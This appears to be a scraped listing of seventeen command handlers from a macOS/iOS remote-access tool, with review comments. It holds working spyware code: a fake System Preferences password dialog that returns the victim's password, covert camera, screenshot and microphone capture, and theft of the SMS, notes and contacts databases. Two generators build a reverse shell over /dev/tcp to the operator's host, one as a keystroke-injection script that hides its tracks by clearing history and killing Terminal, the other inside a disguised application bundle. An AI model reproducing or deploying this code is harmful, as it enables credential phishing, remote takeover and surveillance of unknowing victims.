Esempio n. 1
    def run(self,session,cmd_data):
        """Send an AppleScript password prompt to the session and print the reply.

        The script text below is placed in cmd_data as the "args" of an
        "applescript" command and sent with session.send_command(). The reply
        is stripped, decoded and reported through h.info_success(). Always
        returns "".
        """
        # What the script text asks the remote side to do:
        #   * activate Finder and show a hidden-answer dialog whose wording
        #     attributes the request to System Preferences and whose icon is
        #     FileVaultIcon.icns from CoreTypes.bundle;
        #   * keep looping until a non-empty answer is typed (presumably Cancel
        #     raises inside the `try`, so the dialog simply reappears -- confirm);
        #   * echo the typed text through `do shell script`, which makes it the
        #     command's output.
        # `ans` is assigned in the script but never read afterwards.
        # NOTE(review): what a defender can observe is a script-driven
        # `display dialog ... with hidden answer` hosted by Finder; the dialog is
        # drawn by the script, not by the system's own authorization UI.
        payload = """
        tell application "Finder"
            activate

            set myprompt to "Type your password to allow System Preferences to make changes"
                        
            set ans to "Cancel"

            repeat
                try
                    set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
                    set ans to button returned of d_returns
                    set mypass to text returned of d_returns
                    if mypass > "" then exit repeat
                end try
            end repeat
                        
            try
                do shell script "echo " & quoted form of mypass
            end try
        end tell
        """
        # Mutates the caller's dict in place rather than building a new one.
        cmd_data.update({"cmd":"applescript","args":payload})
        password = session.send_command(cmd_data).strip()
        #display response
        # The typed value is printed in clear text on the operator console.
        # .decode() assumes send_command() returned bytes -- TODO confirm.
        h.info_success("Response: "+password.decode())
        return ""
Esempio n. 2
 def run(self, session, cmd_data):
     """Ask the session for a camera picture and store it under downloads/.

     cmd_data['args'] must be "front" or "back"; it is replaced by True
     (front) or False (back) before the command is sent. Returns None.
     """
     if not cmd_data['args'] or (cmd_data['args'] != "front"
                                 and cmd_data['args'] != "back"):
         # Python 2 print statement: this listing is Python 2 code.
         print self.usage
         return
     if cmd_data['args'] == "back":
         cmd_data['args'] = False
     else:
         cmd_data['args'] = True
     h.info_general("Taking picture...")
     try:
         # The reply is parsed as JSON; the 'success' marker and the byte count
         # both come from the remote side.
         response = json.loads(session.send_command(cmd_data))
         if 'success' in response:
             # NOTE(review): size is peer-supplied and passed on unchecked;
             # nothing in this block bounds how much is read from the socket.
             size = int(response["size"])
             if cmd_data['args'] == False:
                 file_name = "back_{0}.jpg".format(int(time.time()))
             else:
                 file_name = "front_{0}.jpg".format(int(time.time()))
             data = session.sock_receive_data(size)
             h.info_general("Saving {0}".format(file_name))
             # save to file
             # NOTE(review): image bytes go through a text-mode handle ('w'),
             # and the handle is not closed if write() raises.
             f = open(os.path.join('downloads', file_name), 'w')
             f.write(data)
             f.close()
             h.info_success("Saved to downloads/{0}!".format(file_name))
         else:
             if 'error' in response:
                 h.info_error(response['error'])
             else:
                 h.info_error("Unexpected error!")
     except Exception as e:
         # Any failure (bad JSON, missing "size", I/O error) is printed and
         # swallowed; the caller gets no error signal.
         print e
Esempio n. 3
    def run(self, session, cmd_data):
        """Upload a local file through the session.

        cmd_data['args'] holds "<local_file> [<remote_path>]". Arguments are
        separated by spaces that are not preceded by a backslash. When the
        remote part is missing, the file goes to "." under its local name.
        """
        if not cmd_data['args']:
            print self.usage
            return
        else:
            # Split on every space that is not escaped with a backslash. The
            # backslashes themselves stay in the pieces; presumably
            # upload_file() copes with that -- TODO confirm.
            paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
            if len(paths) > 2:
                print "Usage: upload <local_file> <remote_dir>"
                return

            # local_dir is computed but not used anywhere in this block.
            local_dir = os.path.split(paths[0])[0]
            local_file = os.path.split(paths[0])[1]

            if len(paths) == 1:
                remote_dir = "."
                remote_file = local_file
            else:
                # An empty directory part falls back to ".", an empty file part
                # (remote path ends in "/") falls back to the local file name.
                remote_dir = os.path.split(paths[1])[0]
                if not remote_dir:
                    remote_dir = "."
                remote_file = os.path.split(paths[1])[1]
                if not remote_file:
                    remote_file = local_file

            # NOTE(review): the success message is printed unconditionally;
            # the return value of upload_file() is not inspected here.
            session.upload_file(paths[0], remote_dir, remote_file)
            h.info_success("File successfully uploaded!")
Esempio n. 4
	def run(self,server):
		"""Prompt for options and write a keystroke-injection script to disk.

		Reads a shell name, a persistence choice and an output path from the
		operator, builds one shell command line from them plus server.host and
		server.port, embeds it in a DELAY/STRING/ENTER script and saves that.
		"""
		# The `while 1` loop runs exactly once: both branches end in `break`.
		# The command line redirects the chosen shell's stdout/stderr to
		# /dev/tcp/<server.host>/<server.port> and takes stdin from it; the
		# persistent variant wraps that in `while true ... sleep 5 ... &`.
		# NOTE(review): for defenders the traces on the machine where the script
		# is typed are a shell with /dev/tcp redirections, `history -wc`, and
		# Terminal being killed right after it was opened through Spotlight.
		# NOTE(review): every bare `exit` below is a name lookup, not a call, so
		# the error branches fall through and payload_save_path can be unbound
		# when it is used for saving. Tabs and spaces are mixed throughout;
		# Python 3 is likely to reject this indentation (raw_input makes the
		# block Python 2 anyway).
		while 1:
			shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
			while shell == "":
			    shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
			persistence = raw_input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
			if persistence == "y":
				shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
				break
			else:
				shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
				break
		shell_command += "history -wc;killall Terminal"
		path = raw_input(h.info_general_raw("Output path: ")).strip(" ")
		if path == "":
		    path = "payload.txt"
		if os.path.isdir(path):
		    if os.path.exists(path):
			if path[-1:] == "/":
                             payload_save_path = path + "payload.txt"
                        else:
                             payload_save_path = path + "/payload.txt"
		    else:
			h.info_error("Local directory: "+path+": does not exist!")
			exit
		else:
		    direct = os.path.split(path)[0]
		    if direct == "":
			direct = "."
		    else:
			pass
		    if os.path.exists(direct):
		        if os.path.isdir(direct):
		            payload_save_path = path
		        else:
			    h.info_error("Error: "+direct+": not a directory!")
			    exit
		    else:
		        h.info_error("Local directory: "+direct+": does not exist!")
		        exit
			
		payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """+shell_command+"""
DELAY 500
ENTER
DELAY 500"""
		h.info_general("Saving to " + payload_save_path + "...")
		f = open(payload_save_path,"w")
		f.write(payload)
		f.close()
		h.info_success("Saved to " + payload_save_path + "!")
Esempio n. 5
    def run(self, server):
        """Prompt for options and assemble an application bundle around a script.

        Reads a shell name, an icon path, a persistence choice and an output
        path from the operator, copies the template bundle data/app/payload.app
        to the output path, moves the icon into it and writes a bash script
        holding one command line built from the answers plus server.host and
        server.port.
        """
        # The loop body runs once: both branches end in `break`.
        while 1:
            shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
            icon = raw_input(
                h.info_general_raw("Application Icon: ")).strip(" ")
            persistence = raw_input(
                h.info_question_raw("Make Persistent? (y/n): ")).strip(
                    " ").lower()
            # The command line redirects the chosen shell's stdout/stderr to
            # /dev/tcp/<server.host>/<server.port> and takes stdin from it.
            if persistence == "y":
                shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                break
            else:
                shell_command = shell + " &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                break
        path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
        # Raises KeyError when OLDPWD is not set in the environment.
        w = os.environ['OLDPWD']
        os.chdir(w)
        if os.path.isdir(path):
            if os.path.exists(path):
                # NOTE(review): path[:-1] is everything except the last
                # character, so this equals "/" only for a two-character path.
                if path[:-1] == "/":
                    payload_save_path = path + "payload.app"
                else:
                    payload_save_path = path + "/payload.app"
            else:
                h.info_error("Local directory: " + path + ": does not exist!")
                # NOTE(review): bare `exit` is a name lookup, not a call; the
                # function keeps going and payload_save_path stays unbound.
                exit
        else:
            direct = os.path.split(path)[0]
            if os.path.exists(direct):
                if os.path.isdir(direct):
                    payload_save_path = path + "/Contents/MacOS/payload.sh"
                else:
                    h.info_error("Error: " + direct + ": not a directory!")
                    exit
            else:
                h.info_error("Local directory: " + direct +
                             ": does not exist!")
                exit
        # NOTE(review): the typed path and icon are concatenated unquoted into
        # command lines that os.system() hands to a shell on the local machine.
        os.system("cp -r data/app/payload.app " + path + " > /dev/null")
        os.system("mv " + icon + " " + path +
                  "/Contents/Resources/payload.icns > /dev/null")
        payload = """\
#! /usr/bin/env bash
""" + shell_command
        h.info_general("Saving to " + path + "...")
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_success("Saved to " + path + "!")
        os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
        # Working directory is moved to $HOME/mouse before returning.
        g = os.environ['HOME']
        os.chdir(g + "/mouse")
Esempio n. 6
 def run(self, session, cmd_data):
     """Fetch the SMS database through the session and save it locally.

     Reads /var/mobile/Library/SMS/sms.db on the remote side and writes it to
     downloads/sms.db. cmd_data is not used. Returns None.
     """
     file_name = "sms.db"
     h.info_general("Downloading {0}".format(file_name))
     # The remote path is fixed; only the file name part is a variable.
     data = session.download_file('/var/mobile/Library/SMS/' + file_name)
     # A falsy result produces no message at all.
     if data:
         # save to downloads
         h.info_general("Saving {0}".format(file_name))
         # NOTE(review): database bytes are written through a text-mode handle
         # ('w'); the handle is not closed if write() raises.
         f = open(os.path.join('downloads', file_name), 'w')
         f.write(data)
         f.close()
         h.info_success("Saved to downloads/{0}!".format(file_name))
Esempio n. 7
 def run(self, session, cmd_data):
     """Fetch one remote file through the session into downloads/.

     cmd_data['args'] is the remote path. The local name is its last path
     component. Returns None.
     """
     if not cmd_data['args']:
         print self.usage
         return
     # Only the last component is kept, so the local file always lands
     # directly inside downloads/ (an argument ending in "/" gives "").
     file_name = os.path.split(cmd_data['args'])[-1]
     h.info_general("Downloading {0}...".format(file_name))
     data = session.download_file(cmd_data['args'])
     # A falsy result produces no message at all.
     if data:
         # save to downloads
         h.info_general("Saving {0}...".format(file_name))
         # NOTE(review): content is written through a text-mode handle ('w');
         # the handle is not closed if write() raises.
         f = open(os.path.join('downloads', file_name), 'w')
         f.write(data)
         f.close()
         h.info_success("File saved to downloads/{0}!".format(file_name))
Esempio n. 8
 def run(self, session, cmd_data):
     """Ask the session for a screenshot and store it under downloads/.

     The reply to the command is JSON: an 'error' key is reported, a 'size'
     key announces how many bytes follow on the socket. Returns None.
     """
     h.info_general("Taking screenshot...")
     # No try/except here: a reply that is not valid JSON raises out of run().
     result = json.loads(session.send_command(cmd_data))
     if 'error' in result:
         h.info_error(result['error'])
         return
     elif 'size' in result:
         # NOTE(review): size is peer-supplied and passed on unchecked.
         size = int(result['size'])
         data = session.sock_receive_data(size)
         file_name = "screenshot_{0}.jpg".format(int(time.time()))
         h.info_general("Saving {0}".format(file_name))
         # save to file
         # NOTE(review): image bytes go through a text-mode handle ('w').
         f = open(os.path.join('downloads', file_name), 'w')
         f.write(data)
         f.close()
         h.info_success("Saved to downloads/{0}!".format(file_name))
     # A reply with neither key is ignored silently.
Esempio n. 9
 def run(self, session, cmd_data):
     """Ask the session for a camera picture and store it under downloads/.

     The reply is JSON with a "status" field; status 1 means "size" bytes of
     image data follow on the socket. Returns None.
     """
     h.info_general("Taking picture...")
     # Parsing happens outside the try: invalid JSON raises out of run().
     response = json.loads(session.send_command(cmd_data))
     try:
         success = response["status"]
         # Any status other than 1 is ignored without a message.
         if success == 1:
             # NOTE(review): size is peer-supplied and passed on unchecked.
             size = int(response["size"])
             file_name = "isight_{0}.jpg".format(int(time.time()))
             data = session.sock_receive_data(size)
             h.info_general("Saving {0}".format(file_name))
             # save to file
             # NOTE(review): image bytes go through a text-mode handle ('w').
             f = open(os.path.join('downloads', file_name), 'w')
             f.write(data)
             f.close()
             h.info_success("Saved to downloads/{0}!".format(file_name))
     except Exception as e:
         # Missing keys and I/O errors are printed and swallowed.
         print e
Esempio n. 10
	def run(self,session,cmd_data):
		"""Fetch one remote file through the session to a chosen local path.

		cmd_data['args'] is "<remote_file> <local_path>", split on whitespace,
		so neither part may contain spaces. The local path may be an existing
		directory (the remote file name is kept) or a file path whose parent
		directory exists.
		"""
		# Two probes are sent before the download: a shell snippet that prints 0
		# when the remote path is a directory, and a "stat" command. A stat reply
		# starting with "stat" is treated as "remote file does not exist"
		# (presumably the tool's own error prefix -- TODO confirm).
		# NOTE(review): the remote path is concatenated unquoted into the
		# `[[ -d ... ]]` snippet, so shell metacharacters in it are interpreted
		# by the remote shell.
		# NOTE(review): `os.path.exists()` right after a true `os.path.isdir()`
		# on the same path cannot fail, so that "does not exist" branch is dead.
		# Downloaded bytes are written through text-mode handles ('w').
		# Tabs and spaces are mixed throughout; Python 3 is likely to reject this
		# indentation (the print statement makes the block Python 2 anyway).
		# The working directory is switched to $OLDPWD for the duration and to
		# $HOME/mouse at the end; the early usage return happens before either.
		if len(cmd_data['args'].split()) < 2:
            		print self.usage
            		return
		
		w = os.environ['OLDPWD']
                os.chdir(w)
		payload = """if [[ -d """+cmd_data['args'].split()[0]+""" ]]
		then
		echo 0
		fi"""
		dchk = session.send_command({"cmd":"","args":payload})
		chk = session.send_command({"cmd":"stat","args":cmd_data['args'].split()[0]})
                if chk[:4] != "stat":
		    if dchk == "0\n":
			h.info_error("Error: "+cmd_data['args'].split()[0]+": not a file!")
		    else:
		        if os.path.isdir(cmd_data['args'].split()[1]):
		    	    if os.path.exists(cmd_data['args'].split()[1]):
			        rp = os.path.split(cmd_data['args'].split()[0])[1]
			        data = session.download_file(cmd_data['args'].split()[0])
			        h.info_general("Downloading {0}...".format(rp))
			        if data:
			            h.info_general("Saving to "+cmd_data['args']+"/{0}...".format(rp))
			            f = open(os.path.join(cmd_data['args'].split()[1],rp),'w')
			            f.write(data)
			            f.close()
                                    if cmd_data['args'].split()[1][-1:] == "/":
                                        h.info_success("Saved to "+cmd_data['args'].split()[1]+""+rp+"!")
                                    else:
			                h.info_success("Saved to "+cmd_data['args'].split()[1]+"/"+rp+"!")
                            else:
                                h.info_error("Local directory: "+cmd_data['args'].split()[1]+": does not exist!")
			else:
			    rp = os.path.split(cmd_data['args'].split()[1])[0]
			    if rp == "":
		    		rp = "."
			    else:
		    		pass
                            if os.path.exists(rp):
			        if os.path.isdir(rp):
				    prr = os.path.split(cmd_data['args'].split()[1])[0]
				    rp = os.path.split(cmd_data['args'].split()[1])[1]
				    pr = os.path.split(cmd_data['args'].split()[0])[1]
			    	    data = session.download_file(cmd_data['args'].split()[0])
			    	    h.info_general("Downloading {0}...".format(pr))
			    	    if data:
			                h.info_general("Saving to {0}...".format(cmd_data['args'].split()[1]))
			                f = open(os.path.join(prr,rp),'w')
			                f.write(data)
			                f.close()
			                h.info_success("Saved to "+cmd_data['args'].split()[1]+"!")
                                else:
				    h.info_error("Error: "+rp+": not a directory!")
                   	    else:
			        h.info_error("Local directory: "+rp+": does not exists!")
                else:
		    h.info_error("Remote file: "+cmd_data['args'].split()[0]+": does not exist!")
		g = os.environ['HOME']
                os.chdir(g + "/mouse")
Esempio n. 11
    def run(self, session, cmd_data):
        """Start or stop a microphone recording on the session.

        "start" forwards the command and prints the raw reply. "stop" expects
        a JSON reply and, on status 1, fetches /tmp/.avatmp from the remote
        side into downloads/mic<timestamp>.caf. Anything else prints usage.
        """
        # #print output
        if cmd_data["args"] == "stop":
            # expect json
            result = json.loads(session.send_command(cmd_data))
            if 'error' in result:
                h.info_error("Error: " + result['error'])
            elif 'status' in result and result['status'] == 1:
                # download file
                # Fixed remote staging path: a dot-file directly under /tmp.
                data = session.download_file("/tmp/.avatmp")
                # save to file
                file_name = "mic{0}.caf".format(str(int(time.time())))
                h.info_general("Saving {0}".format(file_name))
                # NOTE(review): data is not checked before being written, and
                # audio bytes go through a text-mode handle ('w').
                f = open(os.path.join('downloads', file_name), 'w')
                f.write(data)
                f.close()
                h.info_success("Saved to downloads/{0}!".format(file_name))
            # Any other reply to "stop" is ignored without a message.

        elif cmd_data["args"] == "start":
            h.info_general(session.send_command(cmd_data))
        else:
            print "Usage: mic [start|stop]"
Esempio n. 12
    def run(self, session, cmd_data):
        """Fetch the notes database through the session to a chosen local path.

        The first whitespace-separated word of cmd_data['args'] is the
        destination: an existing directory (file saved as notes.sqlite inside
        it) or a file path whose parent directory exists. The remote path is
        fixed: /var/mobile/Library/Notes/notes.sqlite.
        """
        if len(cmd_data['args'].split()) < 1:
            print(self.usage)
            return

        # Relative destinations are resolved against $OLDPWD; a missing
        # variable raises KeyError.
        w = os.environ['OLDPWD']
        os.chdir(w)
        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            # NOTE(review): exists() cannot be false right after a true
            # isdir() on the same path, so the matching else branch is dead.
            if os.path.exists(dest):
                h.info_general("Getting notes...")
                data = session.download_file(
                    '/var/mobile/Library/Notes/notes.sqlite')
                if data:
                    f = open(os.path.join(dest, 'notes.sqlite'), 'wb')
                    f.write(data)
                    f.close()
                    # The "Saving to" line is printed after the file has
                    # already been written; the one-second sleep only paces
                    # the console output.
                    if dest[-1] == "/":
                        h.info_general("Saving to " + dest + "notes.sqlite...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "notes.sqlite!")
                    else:
                        h.info_general("Saving to " + dest +
                                       "/notes.sqlite...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "/notes.sqlite!")
                else:
                    h.info_error("Failed to get notes!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            # dest is treated as a file path; its parent directory must exist.
            rp = os.path.split(dest)[0]
            if rp == "":
                rp = "."
            else:
                pass
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    # rp is reused: from here on it is the file name part.
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Getting notes...")
                    data = session.download_file(
                        '/var/mobile/Library/Notes/notes.sqlite')
                    if data:
                        f = open(os.path.join(pr, rp), 'wb')
                        f.write(data)
                        f.close()
                        h.info_general("Saving to " + dest + "...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "!")
                    else:
                        h.info_error("Failed to get notes!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
        # Working directory is moved to $HOME/mouse before returning.
        g = os.environ['HOME']
        os.chdir(g + "/mouse")
Esempio n. 13
    def run(self, session, cmd_data):
        """Fetch the address book database through the session to a local path.

        The first whitespace-separated word of cmd_data['args'] is the
        destination: an existing directory (file saved as contacts.sqlitedb
        inside it) or a file path whose parent directory exists. The remote
        path is fixed:
        /var/mobile/Library/AddressBook/AddressBook.sqlitedb.
        """
        if len(cmd_data['args'].split()) < 1:
            print(self.usage)
            return

        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            # NOTE(review): exists() cannot be false right after a true
            # isdir() on the same path, so the matching else branch is dead.
            if os.path.exists(dest):
                h.info_general("Getting contacts...")
                data = session.download_file(
                    '/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
                if data:
                    f = open(os.path.join(dest, 'contacts.sqlitedb'), 'wb')
                    f.write(data)
                    f.close()
                    # The "Saving to" line is printed after the write; the
                    # sleep only paces the console output.
                    if dest[-1] == "/":
                        h.info_general("Saving to " + dest +
                                       "contacts.sqlitedb...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest +
                                       "contacts.sqlitedb!")
                    else:
                        h.info_general("Saving to " + dest +
                                       "/contacts.sqlitedb...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest +
                                       "/contacts.sqlitedb!")
                else:
                    h.info_error("Failed to get contacts!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            # dest is treated as a file path; its parent directory must exist.
            rp = os.path.split(dest)[0]
            if rp == "":
                rp = "."
            else:
                pass
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    # rp is reused: from here on it is the file name part.
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Getting contacts...")
                    data = session.download_file(
                        '/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
                    if data:
                        f = open(os.path.join(pr, rp), 'wb')
                        f.write(data)
                        f.close()
                        h.info_general("Saving to " + dest + "...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "!")
                    else:
                        h.info_error("Failed to get contacts!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
Esempio n. 14
    def run(self, session, cmd_data):
        """Ask the session for a camera picture and save it to a chosen path.

        The first whitespace-separated word of cmd_data['args'] is the
        destination: an existing directory (file saved as picture.jpg inside
        it) or a file path whose parent directory exists. cmd_data is sent
        unchanged, destination included.
        """
        if len(cmd_data['args'].split()) < 1:
            print self.usage
            return

        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            # NOTE(review): exists() cannot be false right after a true
            # isdir() on the same path, so the matching else branch is dead.
            if os.path.exists(dest):
                h.info_general("Taking picture...")
                # Parsing happens outside the try: invalid JSON raises.
                response = json.loads(session.send_command(cmd_data))
                try:
                    success = response["status"]
                    if success == 1:
                        # NOTE(review): size is peer-supplied and unchecked;
                        # image bytes go through a text-mode handle ('w').
                        size = int(response["size"])
                        data = session.sock_receive_data(size)
                        f = open(os.path.join(dest, 'picture.jpg'), 'w')
                        f.write(data)
                        f.close()
                except:
                    # Bare except: also catches KeyboardInterrupt/SystemExit.
                    h.info_error("Failed to take picture!")
                    return
                # NOTE(review): reached for any status, so "Saved" is reported
                # even when nothing was written (status != 1).
                if dest[-1:] == "/":
                    h.info_general("Saving to " + dest + "picture.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "picture.jpg!")
                else:
                    h.info_general("Saving to " + dest + "/picture.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "/picture.jpg!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            # NOTE(review): a bare file name gives rp == "", which
            # os.path.exists() reports as missing; there is no "." fallback.
            rp = os.path.split(dest)[0]
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Taking picture...")
                    response = json.loads(session.send_command(cmd_data))
                    try:
                        success = response["status"]
                        if success == 1:
                            size = int(response["size"])
                            data = session.sock_receive_data(size)
                            f = open(os.path.join(pr, rp), 'w')
                            f.write(data)
                            f.close()
                    except:
                        h.info_error("Failed to take picture!")
                        return
                    # Same as above: printed whether or not a file was written.
                    h.info_general("Saving to " + dest + "...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
Esempio n. 15
    def run(self, session, cmd_data):
        """Ask the session for a screenshot and save it to a chosen path.

        The first whitespace-separated word of cmd_data['args'] is the
        destination: an existing directory (file saved as screenshot.jpg
        inside it) or a file path whose parent directory exists. cmd_data is
        sent unchanged, destination included.
        """
        if len(cmd_data['args'].split()) < 1:
            print self.usage
            return

        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            # NOTE(review): exists() cannot be false right after a true
            # isdir() on the same path, so the matching else branch is dead.
            if os.path.exists(dest):
                h.info_general("Taking screenshot...")
                # No try/except: a reply that is not valid JSON raises.
                result = json.loads(session.send_command(cmd_data))
                if 'error' in result:
                    # The remote error text is dropped; a fixed message is shown.
                    h.info_error("Failed to take screenshot!")
                    return
                if 'size' in result:
                    # NOTE(review): size is peer-supplied and unchecked;
                    # image bytes go through a text-mode handle ('w').
                    size = int(result['size'])
                    data = session.sock_receive_data(size)
                    f = open(os.path.join(dest, 'screenshot.jpg'), 'w')
                    f.write(data)
                    f.close()
                # NOTE(review): "Saved" is reported even when the reply had no
                # 'size' key and nothing was written.
                if dest[-1:] == "/":
                    h.info_general("Saving to " + dest + "screenshot.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "screenshot.jpg!")
                else:
                    h.info_general("Saving to " + dest + "/screenshot.jpg...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "/screenshot.jpg!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            # dest is treated as a file path; its parent directory must exist.
            rp = os.path.split(dest)[0]
            if rp == "":
                rp = "."
            else:
                pass
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    # rp is reused: from here on it is the file name part.
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Taking screenshot...")
                    result = json.loads(session.send_command(cmd_data))
                    if 'error' in result:
                        h.info_error("Failed to take screenshot!")
                        return
                    if 'size' in result:
                        size = int(result['size'])
                        data = session.sock_receive_data(size)
                        f = open(os.path.join(pr, rp), 'w')
                        f.write(data)
                        f.close()
                    # Same as above: printed whether or not a file was written.
                    h.info_general("Saving to " + dest + "...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
Esempio n. 16
    def run(self, session, cmd_data):
        """Fetch the notes database through the session to a chosen local path.

        The first whitespace-separated word of cmd_data['args'] is the
        destination: an existing directory (file saved as notes.sqlite inside
        it) or a file path whose parent directory exists. The remote path is
        fixed: /var/mobile/Library/Notes/notes.sqlite.
        """
        if len(cmd_data['args'].split()) < 1:
            print self.usage
            return

        dest = cmd_data['args'].split()[0]
        if os.path.isdir(dest):
            # NOTE(review): exists() cannot be false right after a true
            # isdir() on the same path, so the matching else branch is dead.
            if os.path.exists(dest):
                h.info_general("Getting notes...")
                data = session.download_file(
                    '/var/mobile/Library/Notes/notes.sqlite')
                if data:
                    # NOTE(review): database bytes go through a text-mode
                    # handle ('w').
                    f = open(os.path.join(dest, 'notes.sqlite'), 'w')
                    f.write(data)
                    f.close()
                # NOTE(review): "Saved" is reported even when data was falsy
                # and nothing was written.
                if dest[-1:] == "/":
                    h.info_general("Saving to " + dest + "notes.sqlite...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "notes.sqlite!")
                else:
                    h.info_general("Saving to " + dest + "/notes.sqlite...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "/notes.sqlite!")
            else:
                h.info_error("Local directory: " + dest + ": does not exist!")
        else:
            # NOTE(review): a bare file name gives rp == "", which
            # os.path.exists() reports as missing; there is no "." fallback.
            rp = os.path.split(dest)[0]
            if os.path.exists(rp):
                if os.path.isdir(rp):
                    # rp is reused: from here on it is the file name part.
                    pr = os.path.split(dest)[0]
                    rp = os.path.split(dest)[1]
                    h.info_general("Getting notes...")
                    data = session.download_file(
                        '/var/mobile/Library/Notes/notes.sqlite')
                    if data:
                        f = open(os.path.join(pr, rp), 'w')
                        f.write(data)
                        f.close()
                    # Same as above: printed whether or not a file was written.
                    h.info_general("Saving to " + dest + "...")
                    time.sleep(1)
                    h.info_success("Saved to " + dest + "!")
                else:
                    h.info_error("Error: " + rp + ": not a directory!")
            else:
                h.info_error("Local directory: " + rp + ": does not exist!")
Esempio n. 17
    def run(self, session, cmd_data):
        """Start a microphone recording, or stop it and save the audio locally.

        cmd_data['args'] is either "start" or "stop <local_path>". On "start"
        the args are rewritten to "record" and sent. On "stop" the args are
        rewritten to "stop", the JSON reply is checked and, on status 1,
        /tmp/.avatmp is fetched from the remote side and written to the
        destination (mic.caf inside it when it is a directory).
        """
        if not cmd_data['args']:
            print(self.usage)
            return
        else:
            if cmd_data['args'].split()[0] == "start":
                pass
            else:
                # Anything other than "stop <dest>" is a usage error.
                if len(cmd_data['args'].split()) < 2 or cmd_data['args'].split(
                )[0] != "stop":
                    print(self.usage)
                    return

        if cmd_data['args'].split()[0] == "stop":
            # Relative destinations are resolved against $OLDPWD.
            w = os.environ['OLDPWD']
            os.chdir(w)
            dest = cmd_data['args'].split()[1]
            cmd_data['args'] = "stop"
            if os.path.isdir(dest):
                # NOTE(review): exists() cannot be false right after a true
                # isdir() on the same path, so the matching else is dead.
                if os.path.exists(dest):
                    h.info_general("Stopping record...")
                    result = json.loads(session.send_command(cmd_data))
                    if 'error' in result:
                        # NOTE(review): returns without the chdir at the end
                        # of this branch, leaving the process in $OLDPWD.
                        h.info_error("Failed to record mic!")
                        return
                    elif 'status' in result and result['status'] == 1:
                        # Fixed remote staging path: a dot-file under /tmp.
                        # data is not checked before being written.
                        data = session.download_file("/tmp/.avatmp")
                        f = open(os.path.join(dest, 'mic.caf'), 'wb')
                        f.write(data)
                        f.close()
                    # NOTE(review): "Saved" is reported for any reply without
                    # an 'error' key, written file or not.
                    if dest[-1] == "/":
                        h.info_general("Saving to " + dest + "mic.caf...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "mic.caf!")
                    else:
                        h.info_general("Saving to " + dest + "/mic.caf...")
                        time.sleep(1)
                        h.info_success("Saved to " + dest + "/mic.caf!")
                else:
                    h.info_error("Local directory: " + dest +
                                 ": does not exist!")
            else:
                # dest is treated as a file path; its parent must exist.
                rp = os.path.split(dest)[0]
                if rp == "":
                    rp = "."
                else:
                    pass
                if os.path.exists(rp):
                    if os.path.isdir(rp):
                        # rp is reused: from here on it is the file name part.
                        pr = os.path.split(dest)[0]
                        rp = os.path.split(dest)[1]
                        h.info_general("Stopping record...")
                        result = json.loads(session.send_command(cmd_data))
                        if 'error' in result:
                            h.info_error("Failed to record mic!")
                            return
                        elif 'status' in result and result['status'] == 1:
                            data = session.download_file("/tmp/.avatmp")
                            f = open(os.path.join(pr, rp), 'wb')
                            f.write(data)
                            f.close()
                        h.info_general("Saving to " + dest + "...")
                        time.sleep(1)
